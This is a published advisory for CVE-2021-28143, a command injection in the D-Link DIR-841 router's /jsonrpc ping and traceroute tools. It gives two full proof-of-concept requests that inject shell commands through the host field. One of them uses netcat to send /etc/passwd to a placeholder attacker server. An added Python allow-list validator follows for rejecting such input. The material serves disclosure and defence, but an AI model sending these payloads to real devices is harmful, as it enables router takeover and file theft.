    2.1 KB / 2021-05-21 09:14:38
    # D-LINK DIR-841 Command Injection (CVE-2021-28143)
    
    
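    D-Link DIR-841 versions 3.03 and 3.04 contain an authenticated command injection vulnerability. The injection is reachable through the "System Tools" commands (ping/ping6/traceroute) and can give an attacker full control of the device.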
    
    PoC:
    
    
    ```
    POST /jsonrpc HTTP/1.1
    Host: IP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
    Content-Length: 156
    Origin: IP
    Connection: close
    Referer: http://ip-address:9821/admin/index.html
    Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=<session>
    
    {"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & sleep 5'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
    ```
    
    Exfiltrating files
    
    
    ```
    POST /jsonrpc HTTP/1.1
    Host: IP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
    Content-Length: 156
    Origin: IP
    Connection: close
    Referer: http://ip-address:9821/admin/index.html
    Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=<session>
    
    {"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
    ```
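
Both requests above work because the `host` value reaches a shell unvalidated. The following is an added example (not code from the advisory or from D-Link firmware) of an allow-list check that accepts `host` only when it is a literal IP address or an RFC 1123 hostname; the function names are hypothetical, and the `params.data.host` layout is taken from the PoC bodies.

```python
import ipaddress
import json
import re

# Characters that can occur in an IP literal or hostname; this pre-filter also
# excludes '%', because ipaddress accepts an arbitrary IPv6 scope id after it.
_CHARSET_RE = re.compile(r"[A-Za-z0-9.:-]+")
# RFC 1123 label: no leading or trailing hyphen (a leading '-' would otherwise
# be parsed as an option by the ping/traceroute binary).
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(_LABEL + r"(?:\." + _LABEL + r")*")


def is_safe_host(value):
    """True only for a literal IPv4/IPv6 address or an RFC 1123 hostname."""
    if not isinstance(value, str) or len(value) > 253:
        return False
    if _CHARSET_RE.fullmatch(value) is None:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME_RE.fullmatch(value) is not None


def check_jsonrpc_body(body):
    """Return (ok, reason) for one /jsonrpc request body (str or bytes)."""
    try:
        msg = json.loads(body)
    except (TypeError, ValueError):
        return False, "body is not valid JSON"
    params = msg.get("params") if isinstance(msg, dict) else None
    data = params.get("data") if isinstance(params, dict) else None
    if not isinstance(data, dict) or "host" not in data:
        return True, "no host field"
    if is_safe_host(data["host"]):
        return True, "host accepted"
    return False, "host rejected: %r" % (data["host"],)


# Request body from the first PoC on this page, plus a constructed benign one.
POC_BODY = '{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"\'127.0.0.1 & sleep 5\'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}'
BENIGN_BODY = '{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"192.0.2.10","count":1},"save":true},"id":1}'

if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        print(check_jsonrpc_body(body))
```

The same check can run over proxy or web-server logs of `/jsonrpc` bodies to flag requests whose `host` field is rejected.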
    
    ref:
    
    * https://nvd.nist.gov/vuln/detail/CVE-2021-28143
    * https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt
    